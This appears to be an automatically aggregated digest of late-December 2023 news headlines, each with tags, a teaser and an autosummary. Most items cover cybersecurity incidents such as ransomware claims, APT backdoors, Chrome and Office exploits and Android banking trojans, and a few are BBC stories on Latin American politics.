            Autosummary: The fintech market is undergoing a rapid shift, with the rise of new technologies, such as Open Finance, generative AI and A2A (Account-to-Account) payments having a major impact on business models, according to Juniper Research. "


            How to recognize AI-generated phishing mails

            financial
            2023-12-26 https://www.malwarebytes.com/blog/news/2023/12/how-to-recognize-ai-generated-phishing-mails
            Cybercriminals now have AI to write their phishing emails, which might well improve their success rates. Here's what to watch out for. "

            Autosummary: Repetitive phishing training that neither aligns with how users engage with email nor provides appropriate tools for responding to ambiguous emails is a waste of time, money, and the patience of the employee. Number 5—The content is badly written and may well include typos—AI phishing emails may still use generic greetings, such as “Dear user” or “Dear customer,” instead of addressing the recipient by name. "


            Carbanak Banking Malware Resurfaces with New Ransomware Tactics

            financial exploits ransomware industry
            2023-12-26 https://thehackernews.com/2023/12/carbanak-banking-malware-resurfaces.html
            The banking malware known as Carbanak has been observed being used in ransomware attacks with updated tactics. "The malware has adapted to incorporate attack vendors and techniques to diversify its effectiveness," cybersecurity firm NCC Group said in an analysis of ransomware attacks that took place in November 2023. "Carbanak returned last month through new "

            Autosummary: The company's data shows that industrials (33%), consumer cyclicals (18%), and healthcare (11%) emerged as the top targeted sectors, with North America (50%), Europe (30%), and Asia (10%) accounting for most of the attacks. "


            Carbanak malware returned in ransomware attacks

            exploits ransomware
            2023-12-26 https://securityaffairs.com/156410/malware/carbanak-malware-ransomware-attacks.html
            Researchers at NCC Group reported that in November they observed the return of the infamous banking malware Carbanak in ransomware attacks. The cybersecurity firm NCC Group reported that in November the banking malware Carbanak was observed in ransomware attacks. The Carbanak gang was first discovered by Kaspersky Lab in 2015; the group has stolen at least $300 million […] "

            Autosummary: Carbanak malware returned in ransomware attacks, Pierluigi Paganini, December 26, 2023. Researchers at NCC Group reported that in November they observed the return of the infamous banking malware Carbanak in ransomware attacks. "


            Integris Health patients get extortion emails after cyberattack

            ciber
            2023-12-26 https://www.bleepingcomputer.com/news/security/integris-health-patients-get-extortion-emails-after-cyberattack/
            Integris Health patients in Oklahoma are receiving blackmail emails stating that their data was stolen in a cyberattack on the healthcare network, and if they did not pay an extortion demand, the data would be sold to other threat actors. [...] "

            Autosummary: [Image: Tor dark web site selling personal data of patients. Source: BleepingComputer] The website contains data added between October 19th and December 24th, 2023, allowing visitors to pay $50 to delete the data record or $3 to view it. "


            Rhysida ransomware group hacked Abdali Hospital in Jordan

            exploits ransomware
            2023-12-26 https://securityaffairs.com/156430/cyber-crime/rhysida-ransomware-abdali-hospital-jordan.html
            The Rhysida ransomware group claimed to have hacked Abdali Hospital, a multi-specialty hospital located in Jordan. Abdali Hospital is a multi-specialty hospital located in the modern development of Al-Abdali, Amman, Jordan. Abdali Hospital provides care to patients in numerous specialties. Apart from its general surgery section, it has specialists in orthopedics and rheumatology, gynecology, urology and endocrinology, neurology, nephrology, pulmonology, internal medicine, oncology, […] "

            Autosummary: Apart from its general surgery section, it has specialists in orthopedics and rheumatology, gynecology, urology and endocrinology, neurology, nephrology, pulmonology, internal medicine, oncology, infectious disease, and anesthesiology. “Threat actors leveraging Rhysida ransomware are known to impact “targets of opportunity,” including victims in the education, healthcare, manufacturing, information technology, and government sectors. "


            Thousands join huge migrant caravan in Mexico ahead of Blinken visit

            latam
            2023-12-25 https://www.bbc.co.uk/news/world-latin-america-67818686?at_medium=RSS&at_campaign=KARANGA
            The large procession comes just days before Antony Blinken's visit to Mexico City. "

            Autosummary: "


            Cloud Atlas' Spear-Phishing Attacks Target Russian Agro and Research Companies

            financial rusia-ucrania
            2023-12-25 https://thehackernews.com/2023/12/cloud-atlas-spear-phishing-attacks.html
            The threat actor referred to as Cloud Atlas has been linked to a set of spear-phishing attacks on Russian enterprises. Targets included a Russian agro-industrial enterprise and a state-owned research company, according to a report from F.A.C.C.T., a standalone cybersecurity company formed after Group-IB's formal exit from Russia earlier this year. Cloud Atlas, active since at "

            Autosummary: Also called Clean Ursa, Inception, Oxygen, and Red October, the threat actor is known for its persistent campaigns targeting Russia, Belarus, Azerbaijan, Turkey, and Slovenia. "


            Iran-linked APT33 targets Defense Industrial Base sector with FalseFont backdoor

            industry
            2023-12-25 https://securityaffairs.com/156366/apt/apt33-falsefont-targets-defense-sector.html
            Microsoft reports that the Iran-linked APT33 group is targeting defense contractors worldwide with the FalseFont backdoor. Microsoft says the APT33 (aka Peach Sandstorm, Holmium, Elfin, and Magic Hound) Iranian cyber-espionage group is using the recently discovered FalseFont backdoor malware to attack organizations in the Defense Industrial Base (DIB) sector. “Microsoft has observed the Iranian nation-state actor Peach Sandstorm attempting to […] "

            Autosummary: Iran-linked APT33 targets Defense Industrial Base sector with FalseFont backdoor, Pierluigi Paganini, December 25, 2023. Microsoft reports that the Iran-linked APT33 group is targeting defense contractors worldwide with the FalseFont backdoor. "


            APT group UAC-0099 targets Ukraine exploiting a WinRAR flaw

            exploits
            2023-12-25 https://securityaffairs.com/156381/hacking/uac-0099-apt-exploits-winrar-flaw.html
            The threat actor UAC-0099 is exploiting a flaw in WinRAR to deliver LONEPAGE malware in attacks against Ukraine. A threat actor, tracked as UAC-0099, continues to target Ukraine. In some attacks, the APT group exploited the high-severity WinRAR flaw CVE-2023-38831 to deliver the LONEPAGE malware. The UAC-0099 threat actor has targeted Ukraine since mid-2022; it was spotted […] "

            Autosummary: In May 2023, CERT-UA warned of cyberespionage attacks carried out by UAC-0099 against state organizations and media representatives of Ukraine. Since the CERT-UA publication in May, Deep Instinct has identified new attacks carried out by “UAC-0099” against Ukrainian targets. "


            Video game giant Ubisoft investigates reports of a data breach

            financial
            2023-12-24 https://securityaffairs.com/156331/data-breach/ubisoft-investigating-alleged-data-breach.html
            Video game publisher Ubisoft is investigating reports of an alleged data breach after popular researchers shared evidence of the hack. Ubisoft, the popular video game publisher, is examining reports of a potential data breach following the disclosure of evidence by the prominent researchers at vx-underground. The researchers reported that on December 20, 2023, an unknown threat actor […] "

            Autosummary: Video game giant Ubisoft investigates reports of a data breach, Pierluigi Paganini, December 24, 2023. Video game publisher Ubisoft is investigating reports of an alleged data breach after popular researchers shared evidence of the hack. "


            Mint Mobile discloses new data breach exposing customer data

            financial
            2023-12-23 https://www.bleepingcomputer.com/news/security/mint-mobile-discloses-new-data-breach-exposing-customer-data/
            Mint Mobile has disclosed a new data breach that exposed the personal information of its customers, including data that can be used to perform SIM swap attacks. [...] "

            Autosummary: The customer data exposed in the breach includes: name, telephone number, email address, SIM serial number and IMEI number (a device identifier similar to a serial number), and a brief description of the service plan purchased. Mint says they do not store credit card numbers, so they were not exposed. "


            Argentina protest organisers will have to cover security costs, government says

            latam government
            2023-12-23 https://www.bbc.co.uk/news/world-latin-america-67809237?at_medium=RSS&at_campaign=KARANGA
            Thousands took to the streets this week to protest against the policies of the new President, Javier Milei. "

            Autosummary: "


            Mobile virtual network operator Mint Mobile discloses a data breach

            financial
            2023-12-23 https://securityaffairs.com/156295/data-breach/mint-mobile-data-breach-2.html
            Mobile virtual network operator Mint Mobile suffered a new data breach; threat actors had access to customers’ personal information. Mint Mobile experienced a recent data breach, exposing customers’ personal information to unauthorized access by threat actors. Mint Mobile is a mobile virtual network operator (MVNO) that offers prepaid mobile phone services. As an MVNO, Mint […] "

            Autosummary: Mobile virtual network operator Mint Mobile discloses a data breach, Pierluigi Paganini, December 23, 2023. Mobile virtual network operator Mint Mobile suffered a new data breach; threat actors had access to customers’ personal information. "


            LockBit ransomware gang claims to have breached accountancy firm Xeinadin

            exploits ransomware
            2023-12-23 https://securityaffairs.com/156303/cyber-crime/lockbit-gang-xeinadin.html
            The LockBit ransomware gang claims to have hacked accountancy firm Xeinadin and threatens to leak the alleged stolen data. The LockBit ransomware gang claims responsibility for hacking the Xeinadin accountancy firm and threatens to disclose the alleged stolen data. Xeinadin has over 60,000 clients across the UK and Ireland. In 2021, a significant endorsement came from Exponent, one […] "

            Autosummary: LockBit ransomware gang claims to have breached accountancy firm Xeinadin, Pierluigi Paganini, December 23, 2023. The LockBit ransomware gang claims to have hacked accountancy firm Xeinadin and threatens to leak the alleged stolen data. "


            11 GenAI cybersecurity surveys you should read

            ciber
            2023-12-22 https://www.helpnetsecurity.com/2023/12/22/genai-cybersecurity-surveys/

            Generative AI stands at the forefront of technological innovation, reshaping industries and unlocking new possibilities across various domains. However, as the integration of these technologies continues, a vigilant approach to ethical considerations and regulatory compliance is essential to ensure that the benefits of generative AI in cybersecurity are realized responsibly and sustainably. In this article, you will find excerpts from generative AI surveys we covered in 2023. These findings can help with future cybersecurity strategies. … More

            "

            Autosummary: Only a fraction of risk leaders are prepared for GenAI threats: Companies’ top generative AI concerns include data privacy and cyber issues (65%), employees making decisions based on inaccurate information (60%), employee misuse and ethical risks (55%), and copyright and intellectual property risks (34%). "


            New insights into the global industrial cybersecurity landscape

            industry ciber
            2023-12-22 https://www.helpnetsecurity.com/2023/12/22/critical-infrastructure-security-professionals-video/

            In this Help Net Security video, William Noto, VP and Industry Principal for Claroty, discusses their recent global survey of 1,100 IT and OT security professionals who work in critical infrastructure sectors. When it comes to ransomware attacks, the impact on OT environments is catching up to the impact on IT environments, according to Claroty. Of the 75% of respondents whose organizations were targeted by ransomware attacks in the past year, 69% paid the ransom, … More


            UAC-0099 Using WinRAR Exploit to Target Ukrainian Firms with LONEPAGE Malware

            exploits
            2023-12-22 https://thehackernews.com/2023/12/uac-0099-using-winrar-exploit-to-target.html
            The threat actor known as UAC-0099 has been linked to continued attacks aimed at Ukraine, some of which leverage a high-severity flaw in the WinRAR software to deliver a malware strain called LONEPAGE. "The threat actor targets Ukrainian employees working for companies outside of Ukraine," cybersecurity firm Deep Instinct said in a Thursday analysis. UAC-0099 was first

            Autosummary: The attack chains leveraged phishing messages containing HTA, RAR, and LNK file attachments that led to the deployment of LONEPAGE, a Visual Basic Script (VBS) malware that’s capable of contacting a command-and-control (C2) server to retrieve additional payloads such as keyloggers, stealers, and screenshot malware.


            Real estate agency exposes details of 690k customers

            government
            2023-12-22 https://securityaffairs.com/156261/security/real-estate-agency-exposes-details-of-690k-customers.html
            An exposed instance contained information for a customer relationship management (CRM) system that likely belongs to Goyzer, a real estate property management software maker, the Cybernews research team has discovered. The data was leaked via a publicly exposed and passwordless MongoDB database, which has since been closed. Businesses employ MongoDB to organize and store large […]

            Autosummary: The team discovered that the now-closed database contained details such as names, emails, phone numbers, and scanned copies of receipts, checks, contracts, and IDs. The team believes that malicious actors could employ this type of data for identity theft, phishing attacks, or even to commit financial fraud.


            Decoy Microsoft Word Documents Used to Deliver Nim-Based Malware

            exploits
            2023-12-22 https://thehackernews.com/2023/12/decoy-microsoft-word-documents-used-to.html
            A new phishing campaign is leveraging decoy Microsoft Word documents as bait to deliver a backdoor written in the Nim programming language. "Malware written in uncommon programming languages puts the security community at a disadvantage as researchers and reverse engineers’ unfamiliarity can hamper their investigation," Netskope researchers Ghanashyam Satpathy and Jan Michael Alcantara

            Autosummary: DarkGate has also been put to use by other threat actors like TA571 and TA577, both of which are known to disseminate a variety of malware, including AsyncRAT, NetSupport, IcedID, PikaBot, and QakBot (aka Qbot).


            Nissan Australia cyberattack claimed by Akira ransomware gang

            exploits ransomware ciber
            2023-12-22 https://www.bleepingcomputer.com/news/security/nissan-australia-cyberattack-claimed-by-akira-ransomware-gang/
            Today, the Akira ransomware gang claimed that it breached the network of Nissan Australia, the Australian division of Japanese car maker Nissan. [...]

            Autosummary: "You will find docs with personal information of their employees in the archives and much other interested stuff like NDAs, projects, information about clients and partners etc." Akira surfaced in March 2023 and drew attention after quickly amassing a large number of victims from various industry sectors.


            Operation RusticWeb: Rust-Based Malware Targets Indian Government Entities

            exploits government
            2023-12-22 https://thehackernews.com/2023/12/operation-rusticweb-rust-based-malware.html
            Indian government entities and the defense sector have been targeted by a phishing campaign that’s engineered to drop Rust-based malware for intelligence gathering. The activity, first detected in October 2023, has been codenamed Operation RusticWeb by enterprise security firm SEQRITE. "New Rust-based payloads and encrypted PowerShell commands have been utilized to exfiltrate

            Autosummary: The variant examined by Cyble is a trojanized version of an open-source GitHub project called "QuranApp: Read and Explore" that comes fitted with a wide range of spyware features to record audio and VoIP calls, capture screenshots, gather data from various apps, download additional APK files, and track the victim’s location.


            China to increase curbs on video gaming industry

            industry
            2023-12-22 https://www.bbc.co.uk/news/technology-67801091?at_medium=RSS&at_campaign=KARANGA
            New plans to restrict the online gaming industry in the country send shares in tech giants tumbling.


            The Week in Ransomware - December 22nd 2023 - BlackCat hacked

            exploits ransomware
            2023-12-22 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-22nd-2023-blackcat-hacked/
            Earlier this month, the BlackCat/ALPHV ransomware operation suffered a five-day disruption to their Tor data leak and negotiation sites, rumored to be caused by a law enforcement action. [...]

            Autosummary: We also learned this week about new ransomware attacks or information about old ones. Contributors and those who provided new ransomware information and stories this week include: @malwrhunterteam, @BleepinComputer, @demonslay335, @Seifreed, @billtoulas, @Ionut_Ilascu, @fwosar, @serghei, @LawrenceAbrams, @BrettCallow, @PRODAFT, @AShukuhi, @uuallan, @SophosXOps, @pcrisk, @3xp0rtblog, @oct0xor, @MorganDemboski, and @juanbrodersen. According to our dataset, Akira has primarily targeted organizations located in Europe, North America, and Australia, and operating in the government, manufacturing, technology, education, consulting, pharmaceuticals, and telecommunication sectors.


            Akira ransomware gang claims the theft of sensitive data from Nissan Australia

            exploits ransomware
            2023-12-22 https://securityaffairs.com/156283/cyber-crime/akira-ransomware-breached-nissan-australia.html
            The Akira ransomware group announced it had breached the network of Nissan Australia, the Australian branch of the car maker giant. The Akira ransomware gang claimed to have breached Nissan Australia and to have stolen around 100GB of files from the carmaker giant. The company refused to pay the ransom and the ransomware gang threatened […]

            Autosummary: Pierluigi Paganini, December 22, 2023. The Akira ransomware group announced it had breached the network of Nissan Australia, the Australian branch of the car maker giant.


            86% of cyberattacks are delivered over encrypted channels

            ciber
            2023-12-21 https://www.helpnetsecurity.com/2023/12/21/malware-encrypted-threats/

            Threats over HTTPS grew by 24% from 2022, underscoring the sophisticated nature of cybercriminal tactics that target encrypted channels, according to Zscaler. For the second year in a row, manufacturing was the industry most commonly targeted, with education and government organizations seeing the highest year-over-year increase in attacks. Additionally, malware, which includes malicious web content and malware payloads, continued to dominate over other types of encrypted attacks, with ad spyware sites and cross-site scripting accounting … More

            Autosummary: In total, 86% of all cyber threats, including malware, ransomware, and phishing attacks, are delivered over encrypted channels.


            Urgent: New Chrome Zero-Day Vulnerability Exploited in the Wild - Update ASAP

            exploits
            2023-12-21 https://thehackernews.com/2023/12/urgent-new-chrome-zero-day.html
            Google has rolled out security updates for the Chrome web browser to address a high-severity zero-day flaw that it said has been exploited in the wild. The vulnerability, assigned the CVE identifier CVE-2023-7024, has been described as a heap-based buffer overflow bug in the WebRTC framework that could be exploited to result in program crashes or arbitrary code execution. Clément


            First protests in Argentina against Milei’s austerity plan

            latam
            2023-12-21 https://www.bbc.co.uk/news/business-67783055?at_medium=RSS&at_campaign=KARANGA
            President Javier Milei announces radical measures, including spending cuts and a drastic currency devaluation.


            A closer look at the manufacturing threat landscape

            industry
            2023-12-21 https://www.helpnetsecurity.com/2023/12/21/manufacturers-threats-video/

            The manufacturing industry is embracing digital transformation to fuel efficiency and productivity. However, this evolution is accompanied by profound and growing cybersecurity challenges. In this Help Net Security video, Kory Daniels, CISO at Trustwave, discusses recent comprehensive research highlighting the distinct cybersecurity threats confronting manufacturers. Trustwave SpiderLabs has documented the attack flow utilized by threat groups, exposing their tactics, techniques, and procedures. From email-borne malware to exploiting SMB and DCOM protocols for lateral movement, these … More


            How executives adapt to rising cybersecurity concerns in mobile networks

            ciber
            2023-12-21 https://www.helpnetsecurity.com/2023/12/21/mobile-networks-concerns-video/

            In this Help Net Security video, Rowland Corr, VP & Head of Government Relations at Enea, discusses the implications of burner phones and the crisis of confidence in network operators as they struggle to protect consumers from sophisticated (usually state-sponsored) cyber threats.


            Hackers Exploiting Old MS Excel Vulnerability to Spread Agent Tesla Malware

            exploits
            2023-12-21 https://thehackernews.com/2023/12/hackers-exploiting-old-ms-excel.html
            Attackers are weaponizing an old Microsoft Office vulnerability as part of phishing campaigns to distribute a strain of malware called Agent Tesla. The infection chains leverage decoy Excel documents attached in invoice-themed messages to trick potential targets into opening them and activate the exploitation of CVE-2017-11882 (CVSS score: 7.8), a memory corruption vulnerability in Office’s

            Autosummary: Stealers and trojans notwithstanding, phishing attacks have taken the form of bogus Instagram "Copyright Infringement" emails to steal users’ two-factor authentication (2FA) backup codes via fraudulent web pages with an aim to bypass account protections, a scheme called Insta-Phish-A-Gram.


            Cost of a Data Breach Report 2023: Insights, Mitigators and Best Practices

            financial
            2023-12-21 https://thehackernews.com/2023/12/cost-of-data-breach-report-2023.html
            John Hanley of IBM Security shares 4 key findings from the highly acclaimed annual Cost of a Data Breach Report 2023. What is the IBM Cost of a Data Breach Report? The IBM Cost of a Data Breach Report is an annual report that provides organizations with quantifiable information about the financial impacts of breaches. With this data, they can make data-driven decisions about how they implement

            Autosummary: The main recommendations are: (1) Build security into every stage of software and hardware development and test regularly: employ a DevSecOps approach; adopt secure-by-design and secure-by-default principles during the initial design phase; apply the same principles to cloud environments; conduct application testing or pen testing. (2) Protect data across hybrid cloud environments: gain visibility and control over data in hybrid cloud environments; protect data as it moves between databases, applications and services; utilize data activity monitoring solutions. (3) Use security AI and automation to increase speed and accuracy: embed AI and automation throughout security tool sets to enhance threat detection, response and investigation. (4) Strengthen resiliency by knowing your attack surface and practicing incident response: understand your industry and organization’s exposure to relevant attacks; use ASM tools or adversary simulation techniques for an attacker-informed perspective on risk profile and vulnerabilities; establish a team well-versed in IR protocols and tools; develop IR plans, conduct regular testing, and consider having an IR vendor on retainer for quicker breach response. Drilling down into industry specifics reveals that the costliest breaches occur in healthcare ($10.93M), financial ($5.9M), pharmaceuticals ($4.82M), energy ($4.78M) and industrial ($4.73M).


            Argentina Milei: Thousands protest against austerity plans

            latam
            2023-12-21 https://www.bbc.co.uk/news/world-latin-america-67783335?at_medium=RSS&at_campaign=KARANGA
            Thousands took to the streets of Buenos Aires despite threats of a crackdown on demonstrators.


            Android malware Chameleon disables Fingerprint Unlock to steal PINs

            exploits
            2023-12-21 https://www.bleepingcomputer.com/news/security/android-malware-chameleon-disables-fingerprint-unlock-to-steal-pins/
            The Chameleon Android banking trojan has re-emerged with a new version that uses a tricky technique to take over devices — disable fingerprint and face unlock to steal device PINs. [...]

            Autosummary: Earlier versions of Chameleon spotted in April this year impersonated Australian government agencies, banks, and the CoinSpot cryptocurrency exchange, performing keylogging, overlay injection, cookie theft, and SMS theft on compromised devices.


            New JavaScript Malware Targeted 50,000+ Users at Dozens of Banks Worldwide

            financial exploits
            2023-12-21 https://thehackernews.com/2023/12/new-javascript-malware-targeted-50000.html
            A new piece of JavaScript malware has been observed attempting to steal users’ online banking account credentials as part of a campaign that has targeted more than 40 financial institutions across the world. The activity cluster, which employs JavaScript web injections, is estimated to have led to at least 50,000 infected user sessions spanning North America, South America, Europe, and Japan.

            Autosummary: "Most of the detected phishing pages target users in Germany (17.5%), Poland (13.7%), Spain (12.5%), U.K. (4.2%), Turkey (3.4%) and Singapore (3.1%)." "This sophisticated threat showcases advanced capabilities, particularly in executing man-in-the-browser attacks with its dynamic communication, web injection methods and the ability to adapt based on server instructions and current page state," Langus said.


            ESET fixed a high-severity bug in the Secure Traffic Scanning Feature of several products

            exploits
            2023-12-21 https://securityaffairs.com/156256/security/eset-secure-traffic-scanning-feature-bugs.html
            ESET fixes a high-severity flaw in the Secure Traffic Scanning Feature that could have been exploited to cause web browsers to trust sites that should not be trusted. ESET has addressed a vulnerability (CVE-2023-5594, CVSS score 7.5) in the Secure Traffic Scanning Feature, preventing potential exploitation that could lead web browsers to trust websites using certificates […]


            Phishing attacks use an old Microsoft Office flaw to spread Agent Tesla malware

            financial exploits
            2023-12-21 https://securityaffairs.com/156246/cyber-crime/agent-tesla-phishing-cve-2017-11882.html
            Threat actors are exploiting an old Microsoft Office vulnerability, tracked as CVE-2017-11882, to spread the Agent Tesla malware. Threat actors are exploiting an old Microsoft Office vulnerability, tracked as CVE-2017-11882 (CVSS score: 7.8), as part of phishing campaigns to spread the Agent Tesla malware. Agent Tesla is a spyware that is used to spy on the […]

            Autosummary: Pierluigi Paganini, December 21, 2023. Threat actors are exploiting an old Microsoft Office vulnerability, tracked as CVE-2017-11882, to spread the Agent Tesla malware.


            Ecuador kidnapping of North Yorkshire businessman financially motivated - police

            financial
            2023-12-21 https://www.bbc.co.uk/news/uk-england-york-north-yorkshire-67787383?at_medium=RSS&at_campaign=KARANGA
            At least 30 homes were raided before Colin Armstrong, from North Yorkshire, was found, police say.


            Microsoft: Hackers target defense firms with new FalseFont malware

            exploits
            2023-12-21 https://www.bleepingcomputer.com/news/security/microsoft-hackers-target-defense-firms-with-new-falsefont-malware/
            Microsoft says the APT33 Iranian cyber-espionage group is using recently discovered FalseFont backdoor malware to attack defense contractors worldwide. [...]

            Autosummary: Their targets span a wide range of industry sectors across the United States, Saudi Arabia, and South Korea, including government, defense, research, finance, and engineering verticals.


            Title insurance giant First American offline after cyberattack

            ciber
            2023-12-21 https://www.bleepingcomputer.com/news/security/title-insurance-giant-first-american-offline-after-cyberattack/
            First American Financial Corporation, the second-largest title insurance company in the United States, took some of its systems offline today to contain the impact of a cyberattack. [...]

            Autosummary: Title insurance providers under attack: Fidelity National Financial, another American title insurance provider, issued a similar disclosure last month, saying that its network was impacted by a "cybersecurity incident."


            Chameleon Android Banking Trojan Variant Bypasses Biometric Authentication

            financial exploits
            2023-12-21 https://thehackernews.com/2023/12/new-chameleon-android-banking-trojan.html
            Cybersecurity researchers have discovered an updated version of an Android banking malware called Chameleon that has expanded its targeting to include users in the U.K. and Italy. "Representing a restructured and enhanced iteration of its predecessor, this evolved Chameleon variant excels in executing Device Takeover (DTO) using the accessibility service, all while expanding its targeted region,

            Autosummary: The top countries targeted comprise the U.S. (109 bank apps), the U.K. (48), Italy (44), Australia (34), Turkey (32), France (30), Spain (29), Portugal (27), Germany (23), Canada (17), and Brazil (11).


            First American takes IT systems offline after cyberattack

            ciber
            2023-12-21 https://www.bleepingcomputer.com/news/security/first-american-takes-it-systems-offline-after-cyberattack/
            First American Financial Corporation, the second-largest title insurance company in the United States, took some of its systems offline today to contain the impact of a cyberattack. [...]

            Autosummary: Title insurance providers under attack: Fidelity National Financial, another American title insurance provider, issued a similar disclosure last month, saying that its network was impacted by a "cybersecurity incident."


            How does ThreatDown Vulnerability Assessment and Patch Management work?

            exploits
            2023-12-21 https://www.malwarebytes.com/blog/business/2023/12/how-does-threatdown-vulnerability-assessment-and-patch-management-work
            Dive into the inner workings of ThreatDown Vulnerability Assessment and Patch Management.

            Autosummary: In Nebula, you have a few options for how you want to view found vulnerabilities. Vulnerabilities page: on the left navigation menu, go to Monitor > Vulnerabilities to view vulnerabilities across your environment. Based on the scans shared by the VA, ThreatDown Patch Management (PM) patches both the operating system and third-party applications installed on endpoints.


            How Outlook notification sounds can lead to zero-click exploits

            exploits
            2023-12-21 https://www.malwarebytes.com/blog/news/2023/12/how-outlook-notification-sounds-can-lead-to-zero-click-exploits
            A researcher found two Microsoft vulnerabilities which could be combined to achieve zero-click remote code execution.

            Autosummary: To demonstrate that fact, it is good to know that CVE-2023-35384 is the second patch bypass for CVE-2023-23397, which was discovered by the same researcher and patched by Microsoft as part of its May 2023 security updates. The second vulnerability, listed as CVE-2023-36710, is a Windows Media Foundation Core Remote Code Execution vulnerability where the word Remote refers to the location of the attacker.


            Update Chrome now! Emergency update patches zero-day

            exploits
            2023-12-21 https://www.malwarebytes.com/blog/news/2023/12/update-chrome-now-emergency-update-patches-zero-day
            Google has issued an emergency update for Chrome that fixes an actively exploited zero-day vulnerability in the WebRTC component.

            Autosummary: The zero-day patched in this update is listed as CVE-2023-7024, a heap buffer overflow in Web Real-Time Communications (WebRTC). WebRTC supports video, voice, and generic data to be sent between peers, allowing developers to build powerful voice- and video-communication solutions.


            Webinar recap: Ransomware gangs and Living Off The Land attacks (LOTL)

            exploits ransomware
            2023-12-21 https://www.malwarebytes.com/blog/business/2023/12/webinar-recap-ransomware-gangs-and-living-off-the-land-attacks-lotl
            Learn how RaaS gangs use LOTL tactics in their attacks on organizations.


            AI’s efficacy is constrained in cybersecurity, but limitless in cybercrime

            ciber
            2023-12-20 https://www.helpnetsecurity.com/2023/12/20/ai-security-solutions/

            Bringing artificial intelligence into the cybersecurity field has created a vicious cycle. Cyber professionals now employ AI to enhance their tools and boost their detection and protection capabilities, but cybercriminals are also harnessing AI for their attacks. Security teams then use more AI in response to the AI-driven threats, and threat actors augment their AI to keep up, and the cycle continues. Despite its great potential, AI is significantly limited when employed in cybersecurity. There … More

            Autosummary: For example, AI-aided SIEM may accurately point out anomalies for security personnel to evaluate; however, an inside threat actor can prevent the proper handling of the security issues spotted by the system, rendering the use of AI in this case practically futile. Using AI to fight cyber threats will always be challenging due to various factors, including the need to establish trust, the caution needed when using data for machine learning training, and the importance of human decision-making. It’s good that humans can dismiss AI judgment or decisions, but this also means that human-targeted threats, like social engineering attacks, remain potent.


            Supply chain emerges as major vector in escalating automotive cyberattacks

            industry ciber
            2023-12-20 https://www.helpnetsecurity.com/2023/12/20/automotive-cyberattacks-video/

            In this Help Net Security video, Jay Yaneza, Cybersecurity Architect at VicOne, discusses how, in the first half of the year, cyberattacks on the automotive sector caused losses exceeding $11 billion. These attacks mainly targeted automotive suppliers, not OEMs, showing an increasing trend in supply chain vulnerabilities. Over 90% of the attacks focused on entities other than OEMs.


            BMW dealer at risk of takeover by cybercriminals

            ciber
            2023-12-20 https://securityaffairs.com/156182/breaking-news/bmw-dealer-at-risk-of-takeover-by-cybercriminals.html
            By neglecting to set a password, a BMW dealer in India has jeopardized the entire network of car dealerships in the country and put its clients at risk. The Cybernews research team has discovered that the Bengaluru branch of BMW Kun Exclusive, a BMW dealership in India, has exposed sensitive data to the public. The […]

            Autosummary: List of dealerships with leaked credentials: BMW Bird Automotive, BMW EVM Autokraft, BMW Infinity Cars, BMW Krishna Automobiles, BMW Munich Motors, BMW Navnit Motors, BMW Speed Motorwagen, BMW Titanium Autos, BMW Varsha Autohaus, BMW Bavaria Motors, BMW Eminent Cars, BMW Sanghi Classic, BMW OSL Prestige, BMW Gallops Autohaus, BMW Enterprise BMW. Apart from being left accessible to the public, the fact that credentials were saved in plain text already shows weak cybersecurity practices. If you want to learn more about how BMW Kun Exclusive can mitigate the risks, take a look at the original post at: https://cybernews.com/security/bmw-india-data-leak/ About the author: Paulina Okunytė, Journalist at Cybernews.


            ALPHV/BlackCat ransomware operation disrupted, but criminals threaten more attacks

            exploits ransomware
            2023-12-20 https://www.bitdefender.com/blog/hotforsecurity/alphv-blackcat-ransomware-operation-disrupted-but-criminals-threaten-more-attacks/
            The FBI has disrupted the operations of the ALPHV ransomware group, and seized decryption keys that could help 500 victims unscramble their files without having to pay a ransom. Read more in my article on the Hot for Security blog.

            Autosummary: Having managed to gain access to ALPHV’s private control panel, FBI agents were able to gather substantial information about the criminal enterprise’s operations: "From the Campaigns screen, affiliates can see the victim entity, full ransom price demanded, discount ransom price, expiration date, cryptocurrency addresses, cryptocurrency transactions, type of computer system compromised, ransom demand note, chats with the victim, and more," explained the FBI.


            Halcyon raises $40 million to combat ransomware attacks

            exploits ransomware
            2023-12-20 https://www.helpnetsecurity.com/2023/12/20/halcyon-funding-40-million/

            Halcyon announced it has closed a $40 million Series B funding round led by Bain Capital Ventures (BCV). The company also announced that BCV Partner and former Symantec CEO, Enrique Salem, will join the Board of Directors, and BCV Partner Jeff Williams will join as Chief Revenue Officer. The oversubscribed funding round follows a $50M Series A announced in April 2023, bringing total funding raised in 2023 to $90M. The new capital will be used … More

            Autosummary: “The team has deep expertise and experience, and I look forward to joining them as they work to change the impact of ransomware, and ultimately, defeat it.”


            SimSpace raises $45 million to fuel continued growth

            ransomware
            2023-12-20 https://www.helpnetsecurity.com/2023/12/20/simspace-45-million-investment/

            SimSpace has closed a $45 million equity raise led by L2 Point Management, a private investment firm specializing in flexible capital solutions for growth companies. This investment brings the total capital raised by SimSpace over the past year to $70 million and will support the company’s continued growth trajectory, including its expansion into new geographies. SimSpace works with the most advanced Fortune 2000 companies, as well as national and state governments, to provide unmatched training … More


            Alert: Chinese-Speaking Hackers Pose as UAE Authority in Latest Smishing Wave

            financial
            2023-12-20 https://thehackernews.com/2023/12/alert-chinese-hackers-pose-as-uae.html
            The Chinese-speaking threat actors behind Smishing Triad have been observed masquerading as the United Arab Emirates Federal Authority for Identity and Citizenship to send malicious SMS messages with the ultimate goal of gathering sensitive information from residents and foreigners in the country. "These criminals send malicious links to their victims’ mobile devices through SMS or

            Autosummary: Recipients who click on the embedded link in the message are taken to a bogus, lookalike website ("rpjpapc[.]top") impersonating the UAE Federal Authority for Identity, Citizenship, Customs and Port Security (ICP), which prompts them to enter their personal information such as names, passport numbers, mobile numbers, addresses, and card information.


            3,500 Arrested in Global Operation HAECHI-IV Targeting Financial Criminals

            financial
            2023-12-20 https://thehackernews.com/2023/12/3500-arrested-in-global-operation.html
            A six-month-long international police operation codenamed HAECHI-IV has resulted in the arrests of nearly 3,500 individuals and seizures worth $300 million across 34 countries. The exercise, which took place from July through December 2023, took aim at various types of financial crimes such as voice phishing, romance scams, online sextortion, investment fraud, money laundering


            New Go-Based JaskaGO Malware Targeting Windows and macOS Systems

            exploits
            2023-12-20 https://thehackernews.com/2023/12/new-go-based-jaskago-malware-targeting.html
            A new Go-based information stealer malware called JaskaGO has emerged as the latest cross-platform threat to infiltrate both Windows and Apple macOS systems. AT&T Alien Labs, which made the discovery, said the malware is "equipped with an extensive array of commands from its command-and-control (C&C) server." Artifacts designed for macOS were first observed in July "

            Autosummary: "


